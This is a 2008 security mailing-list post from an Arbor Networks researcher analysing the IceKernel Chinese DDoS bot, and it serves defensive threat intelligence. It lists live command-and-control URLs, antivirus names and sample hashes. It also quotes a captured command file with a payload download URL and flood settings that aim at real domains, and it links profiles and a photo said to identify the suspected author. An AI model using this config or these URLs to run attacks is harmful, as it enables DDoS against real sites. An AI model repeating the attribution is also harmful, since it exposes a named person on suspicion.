[nsp-sec] IceKernel DDOS bot

jose nazario jose at arbor.net
Mon Apr 21 13:23:54 EDT 2008 

Kudos to ShadowServer for finding this one in their URL reports. They found
this while looking for CNN.com attack commands.

This is a Chinese DDoS bot that doesn't appear to be spread too far and wide
yet, but our visibility into Chinese malware infections is weaker than it
could be. [any help appreciated]

The bot uses Internet Explorer as a subprocess to grab the command files.

Live URLs:
www.shadowmp3.com/kernel/cmd.txt
888.17qb.com/hexinddos.txt

The command file grabbed by the malware is in an INI file format, which
makes parsing very easy. Below this message is an example cmd.txt, the
DDOS_*Flood sections are what are pretty obvious about it. The INI file
allows for the full range of bot control: updates, check-in, etc. the C&C
(ver HTTP) doesn't appear to have any access control or authorization
needed, anyone can grab the file(s).


AV detection is ambiguous but present:

F-Secure    Trojan-Downloader.Win32.Agent.jpy
F-Prot6     W32/Backdoor2.ONY
AntiVir     TR/Dldr.Root.258048
AntiVir     BDS/Agent.gsn
NOD32       Win32/NetGuy.A
Kaspersky    Trojan-Downloader.Win32.Agent.jpy
DrWeb       DLOADER.Trojan
AVG7        Agent.PCK
ClamAV      Trojan.Downloader-27207


Sample MD5s:
MD5: c321b997d4e8d442a7fb446c4107ba7b
SHA1: e7ab17a1d9ed8d3df9f7ca64eb387b514a294ca7
File type: application/x-ms-dos-executable
File size: 341504 bytes


MD5: c8d008b22252b2be2314db9beb769660
SHA1: f78ac1be2f4882cd8b7f750112b8e7fed7f14ac3
File type: application/x-ms-dos-executable
File size: 262144 bytes


MD5: b6b2af669e6bc44ee6c5c4cffc2c6f60
SHA1: 6b6536d4cd89a57b6084d783e01455bbeb2ecdc2
File type: application/x-ms-dos-executable
File size: 58368 bytes



About the Author, we think he uses the handle IceKernel:

http://v.wangyou.com/p14971.html
http://hi.csdn.net/iceker2008
http://twitter.com/icekernel
http://www.flickr.com/photos/icekernel/
http://www.bulaoge.com/?icekernel

Here's what we think is his picture:

http://images.v.wangyou.com/photo/2006/3/28/1020060328224720137_1.jpg



Analysis is ongoing, and I'm starting to track these attacks. Any additional
data etc would be greatly appreciated and would benefit the entire nsp-sec
community.

Thanks.


-------------------------------------------------------------
jose nazario, ph.d.  <jose at arbor.net>
security researcher, office of the CTO
Arbor Networks
v: +1 734 821 1427
m: +1 734 693 2969
PGP: 0x40A7BF94
www.arbornetworks.com
-------------------------------------------------------------



Notes:
1. an example cmd.txt file from a live site:

[UpdateServer]
NewVersion=20080419
UpdateFileUrl=http://888.17qb.com/hexinddos.exe


[KernelSetting]
IsReportState=1
ReportStateUrl=http://888.17qb.com/hexin.htm

IsDownFileRun0=0
DownFileRunName0=KernelDbg1.exe
DownFileRunUrl0=

IsDownFileRun1=0
DownFileRunName1=KernelDbg2.exe
DownFileRunUrl1=

IsDownFileRun2=0
DownFileRunName2=KernelDbg3.exe
DownFileRunUrl2=



[DDOS_ScriptFlood]
IsScriptFlood=0
CmdID=33
ScriptFloodUrl=http://www.xk45.cn/
ScriptFloodDNS=www.xk45.cn
ScriptFloodPort=80
ThreadCount=5
IsTimer=1
Timer=20


[DDOS_UdpFlood]
IsUdpFlood=0
CmdID=12
UdpFloodDNS=88.88.88.88
ThreadCount=1
IsTimer=1
Timer=10


[DDOS_SynFlood]
IsSynFlood=0
CmdID=12
SynFloodDNS=www.1698woool.com
SynFloodPort=80
ThreadCount=1
IsTimer=1
Timer=10


[DDOS_TcpFlood]
IsTcpFlood=0
CmdID=18
TcpFloodDNS=www.dadiyt.cn
TcpFloodPort=80
ThreadCount=10
IsTimer=1
Timer=15

More information about the nsp-security mailing list